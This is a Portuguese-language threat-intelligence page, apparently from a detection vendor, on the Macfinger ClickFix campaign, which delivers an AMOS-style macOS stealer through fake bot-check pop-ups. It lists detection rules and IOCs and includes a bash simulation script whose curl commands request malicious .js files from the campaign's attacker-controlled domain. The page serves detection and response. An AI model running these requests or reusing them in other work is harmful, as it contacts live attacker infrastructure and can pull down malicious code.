Campanha ClickFix da Macfinger
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Uma nova campanha de engenharia social rastreada como Macfinger ClickFix visa usuários do macOS injetando scripts maliciosos em sites legítimos. O ataque apresenta páginas falsas de proteção contra bots que enganam as vítimas para executar comandos que baixam malware específico para macOS. O payload parece ser uma variante do Atomic macOS Stealer (AMOS) projetado para roubar credenciais e outras informações do usuário.
Investigação
A investigação identificou sites legítimos comprometidos com scripts injetados que exibem pop-ups de verificação falsos. A análise do tráfego de rede revelou um domínio dedicado usado para rastreamento de usuários, junto com vários endereços IP que dão suporte à entrega de malware e comunicações de Comando e Controle (C2). Padrões de tráfego observados indicam exfiltração de credenciais e informações do sistema por meio de requisições HTTP POST.
Mitigação
Os usuários devem ser treinados para evitar seguir instruções apresentadas por pop-ups de navegador inesperados ou páginas falsas de verificação de bots. As organizações devem implantar filtros da web para bloquear domínios maliciosos conhecidos e endereços IP associados às campanhas ClickFix. Também é recomendado monitorar conexões de saída incomuns para endereços IP não confiáveis em portas não padrão.
Resposta
Se a atividade do Macfinger ClickFix for detectada, os hosts macOS afetados devem ser isolados imediatamente para interromper a exfiltração de dados. Os respondedores devem realizar uma investigação forense completa para determinar a extensão do comprometimento de credenciais. As credenciais potencialmente expostas devem ser redefinidas, e os sistemas devem ser verificados quanto a mecanismos de persistência, como scripts de shell não autorizados ou binários Mach-O.
Fluxo de Ataque
Ainda estamos atualizando esta parte.
Detecções
Tentativa de Comunicação de Lookup de Domínio de IP Possível (via dns)
Comando e Controle Suspeito por Pedido DNS de Domínio de Nível Superior Incomum (TLD) (via dns)
Possível Tentativa de Enumeração System_profiler (via process_creation)
Possível Manipulação de Strings Codificadas em Base64 [MacOS] (via cmdline)
Tentativa Suspeita de Execução de Curl [MacOS] (via cmdline)
IOCs (HashSha256) para detectar: campanha Macfinger ClickFix
IOCs (SourceIP) para detectar: campanha Macfinger ClickFix
IOCs (DestinationIP) para detectar: campanha Macfinger ClickFix
Detectar Tráfego da Campanha Macfinger ClickFix [Firewall]
Detectar Injeção de Script Macfinger ClickFix [Servidor Web]
Execução de Simulação
-
Narrativa & Comandos do Ataque: Um adversário usa uma técnica de engenharia social conhecida como “ClickFix”, onde o usuário é levado a clicar em um botão (frequentemente um falso “conserto” ou “atualização”) que executa um script malicioso. Nesta simulação, imitamos a fase final: o navegador/agente do lado do cliente fazendo uma requisição ao domínio controlado por Macfinger
velvet-otter-glagceis.lifepara buscar um.jsarquivo malicioso. Esta requisição é projetada para corresponder a um dos três critérios de seleção específicos na lógica de detecção. -
Script de Teste de Regressão:
#!/bin/bash # Script de simulação para acionar a regra de detecção Macfinger ClickFix echo "[*] Iniciando Simulação do Macfinger ClickFix..." # Alvo 1: seleção1 (parâmetro do site) echo "[*] Simulando requisição para seleção1..." curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.js?site=test_payload" # Alvo 2: seleção2 (arquivo de hash específico) echo "[*] Simulando requisição para seleção2..." curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.4b1009ff6c3f.js" # Alvo 3: seleção3 (arquivo ext-b) echo "[*] Simulando requisição para seleção3..." curl -s -o /dev/null "http://velvet-otter-glagceis.life/ext-b.4f9db6afad06a.js" echo "[+] Simulação completa. Verifique o SIEM para alertas." -
Comandos de Limpeza:
# Nenhuma limpeza local necessária, pois são requisições de rede de saída. # Se arquivos locais foram criados, removê-los: rm -f /tmp/macfinger_test_*